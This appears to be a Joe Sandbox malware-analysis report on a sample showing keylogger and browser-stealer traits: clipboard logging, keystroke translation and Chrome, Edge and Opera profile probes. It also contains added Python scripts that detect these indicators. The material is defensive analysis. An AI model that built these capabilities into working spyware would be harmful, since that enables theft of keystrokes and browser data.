                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                    • Opcode ID: 3b62390bc4a03d9ad9c7d2b38bb5b27421e4a6395afc46d79e28986b741703c1
                                                                                                                                                    • Instruction ID: 4e4ab6391e79ee7e72ea74f534f30b8979f9b023c25ab3aa265cef1c7d395c1f
                                                                                                                                                    • Opcode Fuzzy Hash: 3b62390bc4a03d9ad9c7d2b38bb5b27421e4a6395afc46d79e28986b741703c1
                                                                                                                                                    • Instruction Fuzzy Hash: 53517B75E1A28286C742EA14C94075A7BB4FB60760F204DDCE8DB839D9EF35A4D4CBC6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 15684066
                                                                                                                                                      • Part of subcall function 1569B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,1568407C), ref: 1569B99F
                                                                                                                                                      • Part of subcall function 15698568: CloseHandle.KERNEL32(156840F5,?,?,156840F5,156E5E74), ref: 1569857E
                                                                                                                                                      • Part of subcall function 15698568: CloseHandle.KERNEL32(156E5E74,?,?,156840F5,156E5E74), ref: 15698587
                                                                                                                                                      • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • Sleep.KERNEL32(000000FA,156E5E74), ref: 15684138
                                                                                                                                                    Strings
                                                                                                                                                    • /sort "Visit Time" /stext ", xrefs: 156840B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                    • String ID: /sort "Visit Time" /stext "
                                                                                                                                                    • API String ID: 368326130-1573945896
                                                                                                                                                    • Opcode ID: def2b829b511890c755ceb2708a4c61bee0bfd1d46c9430267ecc8d1697ff284
                                                                                                                                                    • Instruction ID: 8abbcb74e45d4953ac95af9bbdde50f4c273af93c5d017fde7a1f40fe6f8dd05
                                                                                                                                                    • Opcode Fuzzy Hash: def2b829b511890c755ceb2708a4c61bee0bfd1d46c9430267ecc8d1697ff284
                                                                                                                                                    • Instruction Fuzzy Hash: 4D315275B123189BCB18EBB4DC949FEB7B9AF90205F400169E446A7290EF307D49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156B4770: __onexit.LIBCMT ref: 156B4776
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 1568B797
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                    • Opcode ID: 55e60f5cd2480dcb694c9dc137b81a7700947ee70740066a942f3ca84ef553e4
                                                                                                                                                    • Instruction ID: 8c42d142542294c0b68138cb238667416ce2f5e4c3ec8193ff2b93dd2355f79b
                                                                                                                                                    • Opcode Fuzzy Hash: 55e60f5cd2480dcb694c9dc137b81a7700947ee70740066a942f3ca84ef553e4
                                                                                                                                                    • Instruction Fuzzy Hash: 1121A139B163199BCB14EBB4DC90DEDB3BAAF50210F50052AD506A7294EF347D4ACBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
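The string IDs in the records above (the NirSoft-style `/sort "Visit Time" /stext "` command line used to dump browser history to a text file, the `[Text copied to clipboard]` / `[End of clipboard]` clipboard-logger markers, and the `KeepAlive | Enabled | Timeout: ` log line) are cheap, stable indicators for triaging other dumps of this unpacked region. The scanner below is an added example and is not part of the Joe Sandbox report; it takes the indicator strings verbatim from this page, assumes they may also be stored as UTF-16LE (the surrounding code uses wide-string APIs such as GetModuleFileNameW, but the report does not say which encoding the strings have), and uses a constructed sample buffer so it runs offline. The image base defaults to 0x15680000, the Offset of the dump these records come from.

```python
"""Scan a memory dump or unpacked image for Remcos artefact strings.

Added example, not part of the Joe Sandbox report. Indicator strings are the
ones the report lists under "String ID" for the 0x15680000 region of
fu56fbrtn8.exe; the sample buffer below is constructed, not real sample bytes.
"""
import sys

# Strings recovered in the report's function listing.
REMCOS_INDICATORS = {
    "browser_history_export": b'/sort "Visit Time" /stext "',
    "clipboard_log_start": b"[Text copied to clipboard]",
    "clipboard_log_end": b"[End of clipboard]",
    "keepalive_log": b"KeepAlive | Enabled | Timeout: ",
}


def encodings(needle: bytes):
    """Yield the ASCII form and the UTF-16LE form of an indicator.

    Assumption: the binary may store these as wide strings; the report does
    not state the encoding, so both forms are searched.
    """
    yield "ascii", needle
    yield "utf-16le", needle.decode("ascii").encode("utf-16le")


def scan(data: bytes, base: int = 0x15680000):
    """Return (indicator_name, encoding, virtual_address) for every hit.

    `base` is the image base of the dump so reported addresses line up with
    the xrefs in the report (0x15680000 for this region).
    """
    hits = []
    for name, needle in REMCOS_INDICATORS.items():
        for enc, pattern in encodings(needle):
            start = 0
            while True:
                idx = data.find(pattern, start)
                if idx < 0:
                    break
                hits.append((name, enc, base + idx))
                start = idx + 1
    return hits


def verdict(hits, minimum: int = 2) -> bool:
    """Crude triage rule: at least `minimum` distinct indicators in one image."""
    return len({name for name, _, _ in hits}) >= minimum


# Constructed sample region: zero padding around two indicators, one ASCII
# and one UTF-16LE, so the scanner has something to find when run offline.
SAMPLE = (
    b"\x00" * 16
    + b'/sort "Visit Time" /stext "'
    + b"\x00" * 8
    + "[Text copied to clipboard]".encode("utf-16le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    # usage: scan_remcos.py [dump.bin] [image_base_hex]
    path = sys.argv[1] if len(sys.argv) > 1 else None
    base = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0x15680000
    data = open(path, "rb").read() if path else SAMPLE
    found = scan(data, base)
    for name, enc, va in found:
        print(f"{va:08X} {enc:<9} {name}")
    print("remcos-like:", verdict(found))
```

Run it against the `.sdmp` file downloaded from the report with the region's Offset as the second argument, and the printed addresses can be compared directly with the xrefs listed above (156840B2 for the history-export string, 1568501F for the keep-alive line). String matching of this kind is only a triage aid: the strings sit in the unpacked region, so a packed sample on disk will not match until it has been dumped from memory.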

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5e8ae57d96511da5156c645123c57f52abec8c2fca4ba8135d71906e59f48c12
                                                                                                                                                    • Instruction ID: 70f0970a73d2884e15971ef25546795cbe819fed902ffe91c84bf5a2d0e178b0
                                                                                                                                                    • Opcode Fuzzy Hash: 5e8ae57d96511da5156c645123c57f52abec8c2fca4ba8135d71906e59f48c12
                                                                                                                                                    • Instruction Fuzzy Hash: C7A1D5A67106004BDB18BA7D9C843BDB3C2DBC4625F58427EE51ECB385EB78CD46C6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DE9596), ref: 02DE952E
                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DE9596), ref: 02DE9534
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                    • String ID: yyyy
                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                    • Opcode ID: ea956a41e1dd4b400294b80a06609574658a321d061b8d73848bfcdd32d5f68c
                                                                                                                                                    • Instruction ID: a69308c7e2581c0e2dac5f8c3e41e2900ce0399c291c502572ccbb544959221e
                                                                                                                                                    • Opcode Fuzzy Hash: ea956a41e1dd4b400294b80a06609574658a321d061b8d73848bfcdd32d5f68c
                                                                                                                                                    • Instruction Fuzzy Hash: 63216071A026189BDF11EF64D851AEEB3B9EF48710F5100A5E906E7340E770DE44CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?,156F5598,?,00000000,?,?,?,?,?,?,15695CC9,?,00000001,0000004C,00000000), ref: 15685030
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • GetLocalTime.KERNEL32(?,156F5598,?,00000000,?,?,?,?,?,?,15695CC9,?,00000001,0000004C,00000000), ref: 15685087
                                                                                                                                                    Strings
                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 1568501F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                    • API String ID: 481472006-1507639952
                                                                                                                                                    • Opcode ID: 4d3b28cdb24f907132b35355fa24cc2e461d6812037e70a6f499a8afb5119131
                                                                                                                                                    • Instruction ID: 3bae327871b80224e9c5810eb805081f12511686a56a538231edcf676ac0f6ad
                                                                                                                                                    • Opcode Fuzzy Hash: 4d3b28cdb24f907132b35355fa24cc2e461d6812037e70a6f499a8afb5119131
                                                                                                                                                    • Instruction Fuzzy Hash: A7213565E293586BD700E730C8B473E7BACAB71214F40051ED88207268DF357A48CBE7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1568B0B4
                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1568B0C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                    • Opcode ID: f4fc06f4acfa0597e1ea9277dcb89eb38238dbd078f95aa59f1621de2f7c0d31
                                                                                                                                                    • Instruction ID: e3b1a3e72afc99eb3b159ef828a03faecdf3807f5d1cbf9a9d872b98185a6d7c
                                                                                                                                                    • Opcode Fuzzy Hash: f4fc06f4acfa0597e1ea9277dcb89eb38238dbd078f95aa59f1621de2f7c0d31
                                                                                                                                                    • Instruction Fuzzy Hash: F7017B38B093049BDB21BB34D80A7BE7BB5AF42110F80055DD983075E1EF613455DBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1568C559
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                    • API String ID: 1174141254-2800177040
                                                                                                                                                    • Opcode ID: 92da032cf4df95d0338de1ec97e96555ffc387af28ede9b2fdf748fce3f4aab5
                                                                                                                                                    • Instruction ID: ce970f5093bff56a312a8adea70b51fd263697ecf3beeab78d73002f2a2c8e44
                                                                                                                                                    • Opcode Fuzzy Hash: 92da032cf4df95d0338de1ec97e96555ffc387af28ede9b2fdf748fce3f4aab5
                                                                                                                                                    • Instruction Fuzzy Hash: 44F08C35F07319968B14E7B4EC458FF7B7CEE10112B400629A902A2188EF20B945C6FA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 1568C5BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                    • API String ID: 1174141254-1629609700
                                                                                                                                                    • Opcode ID: 47c0de81b18b701a2dc038c16965f9197fdd073b8e9afd8e25ce24e747c9db10
                                                                                                                                                    • Instruction ID: 7256089106e276a00f161888fe95f096fa1936767efc1ca820490d47c21e6f5e
                                                                                                                                                    • Opcode Fuzzy Hash: 47c0de81b18b701a2dc038c16965f9197fdd073b8e9afd8e25ce24e747c9db10
                                                                                                                                                    • Instruction Fuzzy Hash: E7F08C35B0731996CB04E6B4DC458FF7B7CDD10211B400229AA02A2188EF20B945C6F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 1568C4F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                    • API String ID: 1174141254-4188645398
                                                                                                                                                    • Opcode ID: af7a335b435f3aadc1fc1745938741926b054eb034b2d5355caa7d1fd64c4c55
                                                                                                                                                    • Instruction ID: ab54f738767d98833ea55c61718f600f877d74a72eec63c80263754b9132ddca
                                                                                                                                                    • Opcode Fuzzy Hash: af7a335b435f3aadc1fc1745938741926b054eb034b2d5355caa7d1fd64c4c55
                                                                                                                                                    • Instruction Fuzzy Hash: 44F0A735B0731996CB04E7F8DC458FF7B7CDD10511B40011AA902A2189EF20BD05C7F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 1568B64B
                                                                                                                                                      • Part of subcall function 1568A3E0: GetForegroundWindow.USER32 ref: 1568A416
                                                                                                                                                      • Part of subcall function 1568A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 1568A422
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyboardLayout.USER32(00000000), ref: 1568A429
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyState.USER32(00000010), ref: 1568A433
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyboardState.USER32(?), ref: 1568A43E
                                                                                                                                                      • Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A461
                                                                                                                                                      • Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1568A4C1
                                                                                                                                                      • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                                                    • Opcode ID: e1735e2c801abd06c41986196fd5e1083ed01c34e5b8009d9c5312c7215a0056
                                                                                                                                                    • Instruction ID: 572ce15edbb089cad5f8a8659ec6dbaf5c9c53f8663aed225556b969c376ae55
                                                                                                                                                    • Opcode Fuzzy Hash: e1735e2c801abd06c41986196fd5e1083ed01c34e5b8009d9c5312c7215a0056
                                                                                                                                                    • Instruction Fuzzy Hash: 09E09235B06321538914733DA92ABBD2E519B42570B82024DE8C38BA98DD8A6DD5C3DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 1568B6A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State
                                                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                                                    • Opcode ID: ee0589e4c2d6a044d02ba7a2f3dbedfe0295f05553a59ccadb21c5a1fb4fd4c5
                                                                                                                                                    • Instruction ID: 338440c0484ee8648ba3a45660304a20ad5efe9800597c3e08d1e2b04e2f7515
                                                                                                                                                    • Opcode Fuzzy Hash: ee0589e4c2d6a044d02ba7a2f3dbedfe0295f05553a59ccadb21c5a1fb4fd4c5
                                                                                                                                                    • Instruction Fuzzy Hash: FCE08631B0231253C51476396E1977C2E11DB41560F41010DF8C38B999DD4659D0C3D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
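
The function entries above list the Win32 calls each recovered routine makes: GetKeyState on VK_CONTROL/VK_SHIFT, ToUnicodeEx fed by GetKeyboardState (the virtual-key to character translation a keystroke logger needs), UnhookWindowsHookEx next to the "Online Keylogger Stopped" string, and PathFileExistsW probes of the Chrome, Edge and Opera profile directories. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's "APIs" bullet format and maps API combinations to capability tags so that entries like these can be triaged in bulk. The tag names, the rules, and the SetWindowsHookEx rule (not visible in this excerpt; the report's "Installs a global keyboard hook" signature implies it elsewhere) are this example's own assumptions; the sample entries are constructed from lines on this page.

```python
"""Capability triage for Joe Sandbox per-function 'APIs' listings.

Added example; not part of the Joe Sandbox report or of the analysed sample.
Tag names and rules are this example's own choices.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# One 'APIs' bullet, e.g. "• GetKeyState.USER32(00000011), ref: 1568B64B",
# "• wsprintfW.USER32 ref: 1568B1F3", or a nested
# "• Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?), ref: 1568A461".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Virtual-key codes passed to GetKeyState in the entries on this page (WinUser.h).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}

# Profile-directory fragments the sample hands to PathFileExistsW (from this page).
BROWSER_DIRS = {
    "\\Google\\Chrome\\": "chrome",
    "\\Microsoft\\Edge\\": "edge",
    "\\Opera Software\\": "opera",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    parent: Optional[str]  # calling function when the bullet is a subcall


@dataclass
class Triage:
    calls: List[ApiCall] = field(default_factory=list)
    tags: Set[str] = field(default_factory=set)
    modifiers: Set[str] = field(default_factory=set)
    browsers: Set[str] = field(default_factory=set)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every API bullet in text; headings and string bullets are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            calls.append(ApiCall(m.group("api"), m.group("module"),
                                 raw.split(",") if raw else [],
                                 int(m.group("ref"), 16), m.group("parent")))
    return calls


def triage(text: str) -> Triage:
    """Tag one function entry by the API combinations a keylogger/stealer needs."""
    t = Triage(calls=parse_api_lines(text))
    names = {c.api for c in t.calls}
    for c in t.calls:
        if c.api == "GetKeyState" and c.args and c.args[0] != "?":
            vk = int(c.args[0], 16)
            if vk in VK_NAMES:
                t.modifiers.add(VK_NAMES[vk])
        if c.api == "PathFileExistsW":
            for arg in c.args:
                t.browsers.update(b for d, b in BROWSER_DIRS.items() if d in arg)
    # ToUnicodeEx fed by GetKeyboardState turns a raw VK code into the typed
    # character: the translation step every keystroke logger performs.
    if {"ToUnicodeEx", "GetKeyboardState"} <= names:
        t.tags.add("keystroke-translation")
    if t.modifiers:
        t.tags.add("modifier-key-probe")
    # Assumed rule: this excerpt shows only the teardown; the report's
    # "Installs a global keyboard hook" signature implies the install elsewhere.
    if names & {"SetWindowsHookExW", "SetWindowsHookExA"}:
        t.tags.add("hook-install")
    if "UnhookWindowsHookEx" in names:
        t.tags.add("hook-teardown")
    if t.browsers:
        t.tags.add("browser-profile-probe")
    return t


# Sample entries constructed from the listings on this page.
KEYLOG_ENTRY = """\
APIs
• GetKeyState.USER32(00000011), ref: 1568B64B
  • Part of subcall function 1568A3E0: GetForegroundWindow.USER32 ref: 1568A416
  • Part of subcall function 1568A3E0: GetKeyboardLayout.USER32(00000000), ref: 1568A429
  • Part of subcall function 1568A3E0: GetKeyState.USER32(00000010), ref: 1568A433
  • Part of subcall function 1568A3E0: GetKeyboardState.USER32(?), ref: 1568A43E
  • Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A461
Strings
"""
HOOK_STOP_ENTRY = """\
  • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
  • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
• CloseHandle.KERNEL32(?), ref: 1568B0B4
• UnhookWindowsHookEx.USER32 ref: 1568B0C7
"""
BROWSER_PROBES = (
    "• PathFileExistsW.SHLWAPI(00000000,\\AppData\\Local\\Microsoft\\Edge\\,00000000), ref: 1568C559\n"
    "• PathFileExistsW.SHLWAPI(00000000,\\Opera Software\\Opera Stable\\,00000000), ref: 1568C5BC\n"
    "• PathFileExistsW.SHLWAPI(00000000,\\AppData\\Local\\Google\\Chrome\\,00000000), ref: 1568C4F6\n"
)

if __name__ == "__main__":
    for name, entry in [("keylog", KEYLOG_ENTRY), ("hook-stop", HOOK_STOP_ENTRY), ("browsers", BROWSER_PROBES)]:
        r = triage(entry)
        print(name, sorted(r.tags), sorted(r.modifiers), sorted(r.browsers))
```

The parser keeps subcall bullets attached to their parent function address, so the keystroke-translation tag still fires when ToUnicodeEx is reached only through a helper such as 1568A3E0. Argument values of "?" (unknown to the sandbox) are skipped rather than guessed, and the browser rule matches on directory fragments so that both the UserProfile-relative and AppData-relative paths seen on this page are recognised.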

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AllocValue
• String ID: P,|
• API String ID: 1189806713-4085227803
• Opcode ID: 486ae16781d22705a780089aff3a3602ed21e109407355eaee04ee3af89afadf
• Instruction ID: 64d9a20dab71540f27b342c967c9893fbe7e4b164db003de5161f8e1f0a04654
• Opcode Fuzzy Hash: 486ae16781d22705a780089aff3a3602ed21e109407355eaee04ee3af89afadf
• Instruction Fuzzy Hash: EFC01260DC03804ADF01BBB6A04060D329DFB14304F4849257401C734ADB34D891CFB0
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
